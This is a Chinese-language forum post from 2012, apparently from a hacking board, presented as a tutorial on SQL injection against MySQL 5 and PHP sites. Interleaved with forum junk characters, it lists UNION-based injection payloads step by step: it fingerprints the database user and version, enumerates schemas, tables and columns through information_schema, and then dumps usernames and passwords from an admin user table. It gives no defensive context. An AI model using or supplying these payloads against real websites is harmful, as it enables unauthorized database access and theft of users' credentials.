" T, b! Z4 _: y
教程内容:Mysql 5+php 注入
7 N, m8 h0 N9 p; o, h% H4 G! A
: q: M6 V. m7 S, R; n
; F! }9 p8 @; c: y: ^1 k5 C# p0 ?' d# u3 M3 @
一.查看MYSQL基本信息(库名,版本,用户) D$ W: I$ Z" b" `- k
7 y8 O+ I( [1 |
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
1 H9 T) ?" x3 X. H: @1 a, T: n- r9 E" x* U6 \, M1 x: ~' J
二.查数据库
& _2 L7 Q" ~3 ~$ H. i) w3 ]* b* W+ N, l1 y5 ?: l* U4 h! h
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
8 z5 Y3 h# J+ ?limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
( p) V: d3 L( e% l2 I1 l- _* s. }. u- [
三.暴表
. v% Q3 i) _* g7 d# u" V
& h+ K1 ~" ~1 @1 z) @7 t, Z; Pand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/** W. B2 v2 z# o$ y% F7 M
' U2 L! ?. a0 E7 B! E% d+ q2 |0 A
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
; T6 N$ N- J C+ W b" x- `/ \6 l5 G I6 D( j) N# U+ g* T
四.暴字段, s9 |. [, r" F0 [0 X; x f7 Z( H
) q. z/ R" E3 V1 E6 T( q- |3 Y
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*+ M! X. [1 Y* G3 o1 b
* ]% K9 k) A. b# q% climit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。! w+ K6 F, f/ S' B5 t
* h, ~6 Q- ]/ U, t$ H' R( u5 L* M
五.暴数据
$ ]6 N' L. T( I5 P) g. u5 B" o' ~4 r% U1 H, v8 [
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*9 N0 u+ g' L5 Y0 o* q5 C
, L- h4 f. n8 r
, K1 e' _0 u/ E G
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。& Q% s: r9 ]. h. {( d
|
发表于 2012-9-13 16:27:53
收藏
支持
反对